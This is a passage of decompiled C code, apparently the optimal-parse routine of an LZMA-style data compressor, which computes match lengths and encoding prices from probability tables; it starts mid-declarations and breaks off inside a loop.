				signed int _t799;
				signed int _t801;
				signed int _t802;
				signed int _t804;
				signed int _t810;
				void* _t811;
				signed int _t815;
				void* _t822;
				signed int _t828;
				signed int _t829;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				intOrPtr* _t854;
				signed int _t858;
				signed int _t874;
				void* _t882;
				signed int _t896;
				signed int _t898;
				signed int _t902;
				intOrPtr* _t903;
				signed int _t908;
				void* _t910;
				signed int _t913;
				signed int* _t917;
				signed int _t919;
				intOrPtr _t920;
				signed int _t935;
				signed int _t939;
				intOrPtr* _t940;
				intOrPtr* _t943;
				void* _t944;
				void* _t945;
				signed int _t948;
				signed int _t952;
				intOrPtr* _t953;
				signed int _t966;
				signed int _t970;
				signed int _t971;
				void* _t972;
				signed int _t977;
				signed int _t982;
				signed int _t986;
				signed int _t988;
				void* _t992;
				signed int _t993;
				signed int _t995;
				signed int _t1012;
				void* _t1018;
				signed int _t1019;
				intOrPtr _t1023;
				signed int _t1024;
				signed int _t1027;
				intOrPtr _t1029;
				signed int _t1030;
				signed int _t1037;
				signed int _t1041;
				void* _t1047;
				void* _t1061;
				intOrPtr _t1064;
				intOrPtr _t1071;
				intOrPtr* _t1072;
				void* _t1077;
				intOrPtr _t1079;
				signed int _t1080;
				signed int _t1087;
				signed int _t1096;
				intOrPtr* _t1099;
				signed int _t1101;
				signed int _t1106;
				void* _t1108;
				signed int _t1118;
				signed int _t1120;
				signed int _t1121;
				signed int _t1122;
				signed int _t1128;
				intOrPtr _t1129;
				signed int _t1131;
				signed int _t1136;
				void* _t1137;
				intOrPtr* _t1140;
				signed int _t1141;
				signed int _t1142;
				signed int _t1143;
				signed int _t1148;
				void* _t1151;
				void* _t1153;

				while(1) {
					L58:
					_t854 =  *((intOrPtr*)(_t1153 + 0x20));
					_t686 = _t854 -  *((intOrPtr*)(_t1153 + 0x5c +  *(_t1153 + 0x80) * 4)) - 1;
					 *(_t1153 + 0x28) = _t686;
					if( *_t854 !=  *_t686) {
						goto L86;
					}
					L59:
					_t1023 =  *((intOrPtr*)(_t1153 + 0x20));
					_t910 =  *(_t1153 + 0x28);
					if( *((intOrPtr*)(_t1023 + 1)) !=  *((intOrPtr*)(_t910 + 1))) {
						goto L86;
					}
					_t1141 =  *(_t1153 + 0x24);
					_t1087 = 2;
					if(_t1141 <= 2) {
						L64:
						_t1024 =  *(_t1153 + 0x18);
						_t801 = _t1087 +  *(_t1153 + 0x14);
						if(_t1024 >= _t801) {
							L67:
							_t1142 = _t1087;
							_t733 = E00460150( *(_t1153 + 0x80), _t1151,  *((intOrPtr*)(_t1153 + 0x20)),  *(_t1153 + 0x30)) +  *((intOrPtr*)(_t1153 + 0x48));
							_t913 =  *(_t1153 + 0x30) * 0x110;
							 *(_t1153 + 0x4c) = _t913;
							_t1027 = _t1151 + 0x37858 + (_t913 + _t1087) * 4;
							 *(_t1153 + 0x50) = _t733;
							 *(_t1153 + 0x2c) = _t1027;
							_t917 = _t1151 + 0x6bc + (_t801 + _t801 * 2 + _t801 + _t801 * 2) * 8;
							_t802 = _t1027;
							do {
								_t1029 =  *_t802 + _t733;
								if(_t1029 <  *((intOrPtr*)(_t917 - 0x1c))) {
									 *((intOrPtr*)(_t917 - 0x1c)) = _t1029;
									 *(_t917 - 4) =  *(_t1153 + 0x14);
									 *_t917 =  *(_t1153 + 0x80);
									 *(_t917 - 0x14) = 0;
								}
								_t1087 = _t1087 - 1;
								_t802 = _t802 - 4;
								_t917 = _t917 - 0x30;
							} while (_t1087 >= 2);
							if( *(_t1153 + 0x80) == 0) {
								_t315 = 1 + _t1142; // 0x4
								 *(_t1153 + 0x40) = _t315;
							}
							_t1030 =  *(_t1153 + 0x34);
							_t319 = 1 + _t1142; // 0x4
							_t734 = _t319;
							_t919 =  *(_t1151 + 0x31934) + _t734;
							 *(_t1153 + 0x2c) = _t919;
							if(_t919 > _t1030) {
								_t919 = _t1030;
								 *(_t1153 + 0x2c) = _t1030;
							}
							_t920 =  *((intOrPtr*)(_t1153 + 0x20));
							if(_t734 >= _t919) {
								L79:
								_t735 = _t734 + (_t1030 | 0xffffffff) - _t1142;
								 *((intOrPtr*)(_t1153 + 0x3c)) = _t735;
								if(_t735 < 2) {
									goto L86;
								}
								_t737 =  *(_t1153 + 0x84) + _t1142;
								 *(_t1153 + 0x2c) = _t737;
								 *(_t1153 + 0x44) = _t737 &  *(_t1151 + 0x325a4);
								_t740 = L0045FBE0( *( *(_t1153 + 0x28) + _t1142) & 0x000000ff,  *(_t1142 + _t920) & 0x000000ff, _t1151 + 0x30ea0, ((( *(_t1142 + _t920 - 1) & 0x000000ff) >> 8 -  *(_t1151 + 0x32598)) + ( *(_t1153 + 0x44) <<  *(_t1151 + 0x32598))) * 0x600 +  *((intOrPtr*)(_t1151 + 0x325ac)));
								_t1037 =  *(0x47c63c +  *(_t1153 + 0x1c) * 4);
								_t804 =  *(_t1151 + 0x325a8);
								_t1096 =  *(0x47c5dc + _t1037 * 4);
								_t360 = 1 +  *(_t1153 + 0x84); // 0x4
								_t935 = _t1142 + _t360 & _t804;
								_t1041 = (_t1096 << 4) + _t935;
								 *(_t1153 + 0x44) = _t1041;
								 *(_t1153 + 0x50) = ( *(_t1151 + 0x325b0 + _t1041 * 2) & 0x0000ffff ^ 0x000007f0) >> 4;
								_t1047 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32730 + _t1096 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 +  *(_t1153 + 0x50) * 4)) + _t740 +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + (( *(_t1153 + 0x2c) & _t804) + (_t1037 << 4)) * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x37858 + ( *(_t1153 + 0x4c) + _t1142) * 4)) +  *(_t1153 + 0x50);
								_t810 =  *((intOrPtr*)(_t1153 + 0x3c)) + _t1142 + 1 +  *(_t1153 + 0x14);
								_t746 =  *(_t1153 + 0x18);
								 *(_t1153 + 0x4c) = _t810;
								if(_t746 >= _t810) {
									L84:
									_t939 = _t810 + _t810 * 2 + _t810 + _t810 * 2;
									_t754 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32790 +  *(_t1153 + 0x44) * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32748 + _t1096 * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x37858 + (_t935 * 0x110 +  *((intOrPtr*)(_t1153 + 0x3c))) * 4)) + _t1047;
									_t940 = _t1151 + 0x6a0 + _t939 * 8;
									if(_t754 <  *((intOrPtr*)(_t1151 + 0x6a0 + _t939 * 8))) {
										 *_t940 = _t754;
										_t420 = 1 +  *(_t1153 + 0x14); // 0x4
										 *((intOrPtr*)(_t940 + 0x18)) = _t1142 + _t420;
										 *(_t940 + 0x10) =  *(_t1153 + 0x14);
										 *(_t940 + 0x1c) = 0;
										 *(_t940 + 8) = 1;
										 *(_t940 + 0xc) = 1;
										 *(_t940 + 0x14) =  *(_t1153 + 0x80);
									}
									goto L86;
								}
								 *(_t1153 + 0x50) = _t1151 + 0x6a0 + (_t746 + _t746 * 2 + _t746 + _t746 * 2) * 8;
								_t760 =  *(_t1153 + 0x18);
								_t811 = _t810 - _t760;
								 *(_t1153 + 0x18) = _t760 + _t811;
								_t762 =  *(_t1153 + 0x50);
								do {
									_t762 = _t762 + 0x30;
									_t811 = _t811 - 1;
									 *_t762 = 0x40000000;
								} while (_t811 != 0);
								_t810 =  *(_t1153 + 0x4c);
								goto L84;
							} else {
								_t1099 = _t734 + _t920;
								_t1030 =  *(_t1153 + 0x28) - _t920;
								while( *_t1099 ==  *((intOrPtr*)(_t1099 + _t1030))) {
									_t734 = _t734 + 1;
									_t1099 = _t1099 + 1;
									if(_t734 <  *(_t1153 + 0x2c)) {
										continue;
									}
									goto L79;
								}
								goto L79;
							}
						}
						_t765 = _t801 - _t1024;
						_t943 = _t1151 + 0x6a0 + (_t1024 + _t1024 * 2 + _t1024 + _t1024 * 2) * 8;
						 *(_t1153 + 0x18) = _t1024 + _t765;
						do {
							_t943 = _t943 + 0x30;
							_t765 = _t765 - 1;
							 *_t943 = 0x40000000;
						} while (_t765 != 0);
						goto L67;
					}
					_t766 = _t1023 + 2;
					_t944 = _t910 - _t1023;
					while( *_t766 ==  *((intOrPtr*)(_t944 + _t766))) {
						_t1087 = 1 + _t1087;
						_t766 = _t766 + 1;
						if(_t1087 < _t1141) {
							continue;
						}
						goto L64;
					}
					goto L64;
					L86:
					_t688 = 1 +  *(_t1153 + 0x80);
					 *(_t1153 + 0x80) = _t688;
					if(_t688 < 4) {
						do {
							L58:
							_t854 =  *((intOrPtr*)(_t1153 + 0x20));
							_t686 = _t854 -  *((intOrPtr*)(_t1153 + 0x5c +  *(_t1153 + 0x80) * 4)) - 1;
							 *(_t1153 + 0x28) = _t686;
							if( *_t854 !=  *_t686) {
								goto L86;
							}
							goto L59;
						} while (_t688 < 4);
					}
					_t1122 =  *(_t1153 + 0x54);
					_t689 =  *(_t1153 + 0x24);
					if(_t1122 <= _t689) {
						L91:
						_t988 =  *(_t1153 + 0x40);
						if(_t1122 < _t988) {
							while(1) {
								L127:
								_t683 = 1 +  *(_t1153 + 0x14);
								 *(_t1153 + 0x14) = _t683;
								if(_t683 ==  *(_t1153 + 0x18)) {
									break;
								}
								_t647 = E004600C0(_t1151, _t1153 + 0x38);
								 *(_t1153 + 0x54) = _t647;
								if(_t647 >=  *(_t1151 + 0x31934)) {
									 *((intOrPtr*)(_t1151 + 0x698)) =  *((intOrPtr*)(_t1153 + 0x38));
									 *(_t1151 + 0x694) = _t647;
									L130:
									return E00460210( *(_t1153 + 0x14), _t1151,  *((intOrPtr*)(_t1153 + 0x88)));
								} else {
									_t1118 =  *(_t1153 + 0x14);
									 *(_t1153 + 0x84) = 1 +  *(_t1153 + 0x84);
									_t791 = _t1118 + _t1118 * 2 << 4;
									_t1071 =  *((intOrPtr*)(_t791 + _t1151 + 0x6a8));
									_t650 =  *(_t791 + _t1151 + 0x6b8);
									_t792 = _t791 + _t1151;
									if(_t1071 == 0) {
										_t970 =  *(_t1151 + 0x6a4 + (_t650 + _t650 * 2 + _t650 + _t650 * 2) * 8);
									} else {
										_t650 = _t650 - 1;
										if( *((intOrPtr*)(_t792 + 0x6ac)) == 0) {
											_t970 =  *(0x47c5dc +  *(_t1151 + 0x6a4 + (_t650 + _t650 * 2 + _t650 + _t650 * 2) * 8) * 4);
										} else {
											_t966 =  *(_t1151 + 0x6a4 + ( *(_t792 + 0x6b0) +  *(_t792 + 0x6b0) * 2 +  *(_t792 + 0x6b0) +  *(_t792 + 0x6b0) * 2) * 8);
											if( *(_t792 + 0x6b4) >= 4) {
												_t970 =  *(0x47c5dc +  *(0x47c60c + _t966 * 4) * 4);
											} else {
												_t970 =  *(0x47c5dc +  *(0x47c63c + _t966 * 4) * 4);
											}
										}
									}
									if(_t650 != _t1118 - 1) {
										if(_t1071 == 0 ||  *((intOrPtr*)(_t792 + 0x6ac)) == 0) {
											_t828 =  *(_t792 + 0x6bc);
											 *(_t1153 + 0x80) = _t828;
											if(_t828 >= 4) {
												_t971 =  *(0x47c60c + _t970 * 4);
												_t829 =  *(_t1153 + 0x80);
												goto L19;
											}
											 *(_t1153 + 0x1c) =  *(0x47c63c + _t970 * 4);
											_t829 =  *(_t1153 + 0x80);
											goto L20;
										} else {
											_t829 =  *(_t792 + 0x6b4);
											_t650 =  *(_t792 + 0x6b0);
											_t971 =  *(0x47c63c + _t970 * 4);
											 *(_t1153 + 0x80) = _t829;
											L19:
											 *(_t1153 + 0x1c) = _t971;
											L20:
											_t972 = _t1151 + 0x6a0 + (_t650 + _t650 * 2 + _t650 + _t650 * 2) * 8;
											if(_t829 >= 4) {
												 *((intOrPtr*)(_t1153 + 0x5c)) = _t829 + 0xfffffffc;
												 *(_t1153 + 0x60) =  *(_t972 + 0x20);
												 *((intOrPtr*)(_t1153 + 0x64)) =  *((intOrPtr*)(_t972 + 0x24));
												 *((intOrPtr*)(_t1153 + 0x68)) =  *((intOrPtr*)(_t972 + 0x28));
												goto L25;
											}
											 *((intOrPtr*)(_t1153 + 0x5c)) =  *((intOrPtr*)(_t972 + 0x20 + _t829 * 4));
											_t784 = 1;
											if(_t829 < 1) {
												L23:
												memcpy(_t1153 + 0x5c + _t784 * 4, _t972 + 0x20 + _t784 * 4, 4 << 2);
												_t1153 = _t1153 + 0xc;
												goto L25;
											}
											_t784 = memcpy(_t1153 + 0x60, _t972 + 0x20, _t829 << 2);
											_t1153 = _t1153 + 0xc;
											if(1 >= 4) {
												goto L25;
											}
											goto L23;
										}
									} else {
										if( *(_t792 + 0x6bc) != 0) {
											 *(_t1153 + 0x1c) =  *(0x47c5dc + _t970 * 4);
										} else {
											 *(_t1153 + 0x1c) =  *(0x47c66c + _t970 * 4);
										}
										L25:
										_t1120 =  *(_t1153 + 0x1c);
										 *((intOrPtr*)(_t792 + 0x6c0)) =  *((intOrPtr*)(_t1153 + 0x5c));
										 *(_t792 + 0x6c4) =  *(_t1153 + 0x60);
										 *(_t792 + 0x6a4) = _t1120;
										 *((intOrPtr*)(_t792 + 0x6c8)) =  *((intOrPtr*)(_t1153 + 0x64));
										 *((intOrPtr*)(_t792 + 0x6cc)) =  *((intOrPtr*)(_t1153 + 0x68));
										 *(_t1153 + 0x24) =  *(_t792 + 0x6a0);
										 *(_t1153 + 0x28) = 0;
										_t106 =  *((intOrPtr*)( *((intOrPtr*)(_t1151 + 0xc))))() - 1; // -1
										_t1072 = _t106;
										 *(_t1153 + 0x80) =  *_t1072;
										_t659 = _t1072 -  *((intOrPtr*)(_t1153 + 0x5c));
										 *((intOrPtr*)(_t1153 + 0x3c)) = _t659 - 1;
										 *(_t1153 + 0x13) =  *((intOrPtr*)(_t659 - 1));
										_t977 =  *(_t1153 + 0x84);
										_t662 = _t977 &  *(_t1151 + 0x325a8);
										 *(_t1153 + 0x30) = _t662;
										_t663 = _t662 + (_t1120 << 4);
										 *(_t1153 + 0x40) = _t663;
										 *((intOrPtr*)(_t1153 + 0x20)) = _t1072;
										 *(_t1153 + 0x2c) =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + _t663 * 2) & 0x0000ffff) >> 4) * 4)) +  *(_t1153 + 0x24);
										 *(_t1153 + 0x44) =  *(_t1151 + 0x325a4) & _t977;
										_t1077 = ((( *(_t1072 - 1) & 0x000000ff) >> 8 -  *(_t1151 + 0x32598)) + ( *(_t1153 + 0x44) <<  *(_t1151 + 0x32598))) * 0x600 +  *((intOrPtr*)(_t1151 + 0x325ac));
										if(_t1120 < 7) {
											 *(_t1153 + 0x34) = 0;
											_t672 =  *(_t1153 + 0x80) & 0x000000ff | 0x00000100;
											do {
												_t851 =  *(_t1153 + 0x34) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1077 + (_t672 >> 8) * 2) & 0x0000ffff) >> 0x00000004 ^  ~(_t672 >> 0x00000007 & 0x00000001) >> 0x00000004 & 0x0000007f) * 4));
												_t672 = _t672 + _t672;
												 *(_t1153 + 0x34) = _t851;
											} while (_t672 < 0x10000);
											_t673 = _t851;
											L30:
											_t982 =  *(_t1153 + 0x2c) + _t673;
											 *(_t1153 + 0x2c) = _t982;
											if(_t982 <  *(_t792 + 0x6d0)) {
												 *(_t792 + 0x6d0) = _t982;
												 *(_t792 + 0x6e8) =  *(_t1153 + 0x14);
												 *((intOrPtr*)(_t792 + 0x6ec)) = 0xffffffff;
												 *(_t792 + 0x6d8) = 0;
												 *(_t1153 + 0x28) = 1;
											}
											_t852 =  *(_t1153 + 0x40);
											_t678 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + _t852 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *(_t1153 + 0x24);
											_t986 =  *(_t1153 + 0x14);
											_t1079 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32730 + _t1120 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) + _t678;
											 *((intOrPtr*)(_t1153 + 0x58)) = _t678;
											 *((intOrPtr*)(_t1153 + 0x48)) = _t1079;
											if( *(_t1153 + 0x13) ==  *(_t1153 + 0x80) && ( *(_t792 + 0x6e8) >= _t986 ||  *((intOrPtr*)(_t792 + 0x6ec)) != 0)) {
												_t780 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32748 + _t1120 * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32790 + _t852 * 2) & 0x0000ffff) >> 4) * 4)) + _t1079;
												if(_t780 <=  *(_t792 + 0x6d0)) {
													 *(_t792 + 0x6d0) = _t780;
													 *(_t792 + 0x6e8) = _t986;
													 *((intOrPtr*)(_t792 + 0x6ec)) = 0;
													 *(_t792 + 0x6d8) = 0;
													 *(_t1153 + 0x28) = 1;
												}
											}
											_t853 =  *(_t1151 + 0x69c);
											_t681 = 0xfff - _t986;
											 *(_t1153 + 0x34) = _t853;
											if(0xfff < _t853) {
												_t853 = 0xfff;
												 *(_t1153 + 0x34) = _t681;
											}
											if(_t853 < 2) {
												continue;
											} else {
												_t1121 =  *(_t1151 + 0x31934);
												 *(_t1153 + 0x24) = _t853;
												if(_t853 > _t1121) {
													 *(_t1153 + 0x24) = _t1121;
												}
												if( *(_t1153 + 0x28) != 0 ||  *(_t1153 + 0x13) ==  *(_t1153 + 0x80)) {
													L57:
													 *(_t1153 + 0x40) = 2;
													 *(_t1153 + 0x80) = 0;
													goto L58;
												} else {
													_t1143 = 1 + _t1121;
													if(_t1143 > _t853) {
														_t1143 = _t853;
													}
													_t945 = 1;
													if(_t1143 <= 1) {
														L50:
														_t204 = _t945 - 1; // 0x1
														_t767 = _t204;
														 *(_t1153 + 0x80) = _t767;
														if(_t767 < 2) {
															goto L57;
														}
														_t769 =  *(0x47c5dc +  *(_t1153 + 0x1c) * 4);
														_t948 = 0x00000001 +  *(_t1153 + 0x84) &  *(_t1151 + 0x325a8);
														_t815 = (_t769 << 4) + _t948;
														_t1061 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + _t815 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32730 + _t769 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *(_t1153 + 0x2c);
														_t1148 =  *(_t1153 + 0x80) + 1 +  *(_t1153 + 0x14);
														_t1101 =  *(_t1153 + 0x18);
														 *(_t1153 + 0x40) = _t815;
														if(_t1101 >= _t1148) {
															L55:
															_t952 = _t1148 + _t1148 * 2 + _t1148 + _t1148 * 2;
															_t773 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32790 + _t815 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32748 + _t769 * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x37858 + (_t948 * 0x110 +  *(_t1153 + 0x80)) * 4)) + _t1061;
															_t953 = _t1151 + 0x6a0 + _t952 * 8;
															if(_t773 <  *((intOrPtr*)(_t1151 + 0x6a0 + _t952 * 8))) {
																 *_t953 = _t773;
																 *((intOrPtr*)(_t953 + 0x18)) = 1 +  *(_t1153 + 0x14);
																 *((intOrPtr*)(_t953 + 0x1c)) = 0;
																 *(_t953 + 8) = 1;
																 *((intOrPtr*)(_t953 + 0xc)) = 0;
															}
															goto L57;
														}
														 *(_t1153 + 0x44) = _t1151 + 0x6a0 + (_t1101 + _t1101 * 2 + _t1101 + _t1101 * 2) * 8;
														_t822 = _t1148 - _t1101;
														 *(_t1153 + 0x18) = _t1101 + _t822;
														_t1106 =  *(_t1153 + 0x44);
														do {
															_t1106 = _t1106 + 0x30;
															_t822 = _t822 - 1;
															 *_t1106 = 0x40000000;
														} while (_t822 != 0);
														_t815 =  *(_t1153 + 0x40);
														goto L55;
													} else {
														_t1064 =  *((intOrPtr*)(_t1153 + 0x20));
														_t775 = _t1064 + 1;
														_t1108 =  *((intOrPtr*)(_t1153 + 0x3c)) - _t1064;
														while( *_t775 ==  *((intOrPtr*)(_t1108 + _t775))) {
															_t945 = _t945 + 1;
															_t775 = _t775 + 1;
															if(_t945 < _t1143) {
																continue;
															}
															goto L50;
														}
														goto L50;
													}
												}
											}
										}
										_t673 = L0045FBE0( *(_t1153 + 0x13) & 0x000000ff,  *(_t1153 + 0x80) & 0x000000ff, _t1151 + 0x30ea0, _t1077);
										goto L30;
									}
								}
							}
							goto L130;
						}
						 *((intOrPtr*)(_t1153 + 0x58)) =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32730 +  *(_t1153 + 0x1c) * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1153 + 0x58));
						_t694 = _t1122 +  *(_t1153 + 0x14);
						_t858 =  *(_t1153 + 0x18);
						if(_t858 >= _t694) {
							L95:
							_t695 = 0;
							 *(_t1153 + 0x80) = 0;
							if(_t988 <=  *((intOrPtr*)(_t1151 + 0x310a0))) {
								L99:
								_t697 =  *(_t1151 + 0x310a4 +  *(_t1153 + 0x80) * 4);
								_t1080 = 1 + _t988;
								 *(_t1153 + 0x2c) = _t697;
								 *(_t1153 + 0x28) = ( *((_t697 >> ( ~(0x1ffff - _t697 >> 0x1f) & 0x0000000a) + 6) + _t1151 + 0x306a0) & 0x000000ff) + (( ~(0x1ffff - _t697 >> 0x1f) & 0x0000000a) + 6) * 2;
								 *(_t1153 + 0x30) = _t1151 + 0x33010 + ( *(_t1153 + 0x30) * 0x110 + _t988) * 4;
								_t793 = _t1151 + 0x6bc + ( *(_t1153 + 0x14) + _t988 + ( *(_t1153 + 0x14) + _t988) * 2 +  *(_t1153 + 0x14) + _t988 + ( *(_t1153 + 0x14) + _t988) * 2) * 8;
								while(1) {
									_t992 =  *( *(_t1153 + 0x30)) +  *((intOrPtr*)(_t1153 + 0x58));
									 *(_t1153 + 0x24) = _t793;
									 *(_t1153 + 0x44) = _t1080;
									_t874 = _t1080 - 3;
									if(_t1080 - 1 >= 5) {
										_t874 = 3;
									}
									if(_t697 >= 0x80) {
										_t993 = _t992 +  *((intOrPtr*)(_t1151 + 0x31950 + ( *(_t1153 + 0x28) + (_t874 << 6)) * 4)) +  *((intOrPtr*)(_t1151 + 0x32550 + (_t697 & 0x0000000f) * 4));
									} else {
										_t993 = _t992 +  *((intOrPtr*)(_t1151 + 0x31d50 + ((_t874 << 7) + _t697) * 4));
									}
									 *(_t1153 + 0x40) = _t993;
									if(_t993 <  *(_t793 - 0x1c)) {
										 *(_t793 - 0x1c) = _t993;
										 *(_t793 - 4) =  *(_t1153 + 0x14);
										 *_t793 = _t697 + 4;
										 *(_t793 - 0x14) = 0;
									}
									if(_t1080 - 1 !=  *((intOrPtr*)(_t1151 + 0x310a0 +  *(_t1153 + 0x80) * 4))) {
										goto L126;
									}
									L108:
									_t995 =  *(_t1153 + 0x34);
									_t699 =  *(_t1151 + 0x31934) + _t1080;
									_t882 =  *((intOrPtr*)(_t1153 + 0x20)) - _t697 - 1;
									_t1128 = _t1080;
									if(_t699 > _t995) {
										_t699 = _t995;
									}
									if(_t1080 >= _t699) {
										L116:
										_t1129 = _t1128 + (_t995 | 0xffffffff) - _t1080 - 1;
										 *((intOrPtr*)(_t1153 + 0x3c)) = _t1129;
										if(_t1129 < 2) {
											L123:
											_t702 =  *(_t1153 + 0x80) + 2;
											 *(_t1153 + 0x80) = _t702;
											if(_t702 ==  *((intOrPtr*)(_t1153 + 0x38))) {
												goto L127;
											}
											_t697 =  *(_t1151 + 0x310a4 + _t702 * 4);
											 *(_t1153 + 0x2c) = _t697;
											if(_t697 >= 0x80) {
												 *(_t1153 + 0x28) = ( *((_t697 >> ( ~(0x1ffff - _t697 >> 0x1f) & 0x0000000a) + 6) + _t1151 + 0x306a0) & 0x000000ff) + (( ~(0x1ffff - _t697 >> 0x1f) & 0x0000000a) + 6) * 2;
											}
											goto L126;
										}
										_t704 =  *(_t1153 + 0x84) + _t1080 - 1;
										 *(_t1153 + 0x54) = _t704;
										_t1131 =  *(_t1151 + 0x325a8) & _t704;
										_t706 = L0045FBE0( *(_t882 + _t1080 - 1) & 0x000000ff,  *(_t1080 +  *((intOrPtr*)(_t1153 + 0x20)) - 1) & 0x000000ff, _t1151 + 0x30ea0, ((( *( *((intOrPtr*)(_t1153 + 0x20)) + _t1080 - 2) & 0x000000ff) >> 8 -  *(_t1151 + 0x32598)) + (( *(_t1151 + 0x325a4) &  *(_t1153 + 0x54)) <<  *(_t1151 + 0x32598))) * 0x600 +  *((intOrPtr*)(_t1151 + 0x325ac)));
										_t896 =  *(0x47c60c +  *(_t1153 + 0x1c) * 4);
										_t795 =  *(0x47c5dc + _t896 * 4);
										_t1080 =  *(_t1153 + 0x44);
										_t898 = 0x00000001 + _t1131 &  *(_t1151 + 0x325a8);
										_t1012 = (_t795 << 4) + _t898;
										 *(_t1153 + 0x4c) = _t1012;
										_t1018 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + _t1012 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32730 + _t795 * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) + _t706 +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x325b0 + ((_t896 << 4) + _t1131) * 2) & 0x0000ffff) >> 4) * 4)) +  *(_t1153 + 0x40);
										_t1136 =  *((intOrPtr*)(_t1153 + 0x3c)) + _t1080 - 1 + 1 +  *(_t1153 + 0x14);
										_t711 =  *(_t1153 + 0x18);
										 *(_t1153 + 0x50) = _t1136;
										if(_t711 >= _t1136) {
											L121:
											_t793 =  *(_t1153 + 0x24);
											_t902 = _t1136 + _t1136 * 2 + _t1136 + _t1136 * 2;
											_t719 =  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32790 +  *(_t1153 + 0x4c) * 2) & 0x0000ffff ^ 0x000007f0) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x30ea0 + (( *(_t1151 + 0x32748 + _t795 * 2) & 0x0000ffff) >> 4) * 4)) +  *((intOrPtr*)(_t1151 + 0x37858 + (_t898 * 0x110 +  *((intOrPtr*)(_t1153 + 0x3c))) * 4)) + _t1018;
											_t903 = _t1151 + 0x6a0 + _t902 * 8;
											if(_t719 <  *((intOrPtr*)(_t1151 + 0x6a0 + _t902 * 8))) {
												_t1019 =  *(_t1153 + 0x14);
												 *_t903 = _t719;
												 *(_t903 + 0x10) = _t1019;
												 *((intOrPtr*)(_t903 + 0x18)) = _t1080 + _t1019;
												 *(_t903 + 0x1c) = 0;
												 *(_t903 + 8) = 1;
												 *(_t903 + 0xc) = 1;
												 *((intOrPtr*)(_t903 + 0x14)) =  *(_t1153 + 0x2c) + 4;
											}
											goto L123;
										}
										 *(_t1153 + 0x54) = _t1151 + 0x6a0 + (_t711 + _t711 * 2 + _t711 + _t711 * 2) * 8;
										_t725 =  *(_t1153 + 0x18);
										_t1137 = _t1136 - _t725;
										 *(_t1153 + 0x18) = _t725 + _t1137;
										_t727 =  *(_t1153 + 0x54);
										do {
											_t727 = _t727 + 0x30;
											_t1137 = _t1137 - 1;
											 *_t727 = 0x40000000;
										} while (_t1137 != 0);
										_t1136 =  *(_t1153 + 0x50);
										goto L121;
									} else {
										_t799 =  *((intOrPtr*)(_t1153 + 0x20)) - _t882;
										_t995 = _t882 + _t1080;
										 *(_t1153 + 0x54) = _t799;
										while( *((intOrPtr*)(_t799 + _t995)) ==  *_t995) {
											_t1128 = 1 + _t1128;
											_t995 = 1 + _t995;
											if(_t1128 < _t699) {
												_t799 =  *(_t1153 + 0x54);
												continue;
											}
											break;
										}
										_t793 =  *(_t1153 + 0x24);
										goto L116;
									}
									L126:
									 *(_t1153 + 0x30) =  *(_t1153 + 0x30) + 4;
									_t793 = _t793 + 0x30;
									_t1080 = 1 + _t1080;
									_t992 =  *( *(_t1153 + 0x30)) +  *((intOrPtr*)(_t1153 + 0x58));
									 *(_t1153 + 0x24) = _t793;
									 *(_t1153 + 0x44) = _t1080;
									_t874 = _t1080 - 3;
									if(_t1080 - 1 >= 5) {
										_t874 = 3;
									}
									if(_t697 >= 0x80) {
										_t993 = _t992 +  *((intOrPtr*)(_t1151 + 0x31950 + ( *(_t1153 + 0x28) + (_t874 << 6)) * 4)) +  *((intOrPtr*)(_t1151 + 0x32550 + (_t697 & 0x0000000f) * 4));
									} else {
										_t993 = _t992 +  *((intOrPtr*)(_t1151 + 0x31d50 + ((_t874 << 7) + _t697) * 4));
									}
									 *(_t1153 + 0x40) = _t993;
									if(_t993 <  *(_t793 - 0x1c)) {
										 *(_t793 - 0x1c) = _t993;
										 *(_t793 - 4) =  *(_t1153 + 0x14);
										 *_t793 = _t697 + 4;
										 *(_t793 - 0x14) = 0;
									}
									if(_t1080 - 1 !=  *((intOrPtr*)(_t1151 + 0x310a0 +  *(_t1153 + 0x80) * 4))) {
										goto L126;
									}
								}
							}
							do {
								_t695 = _t695 + 2;
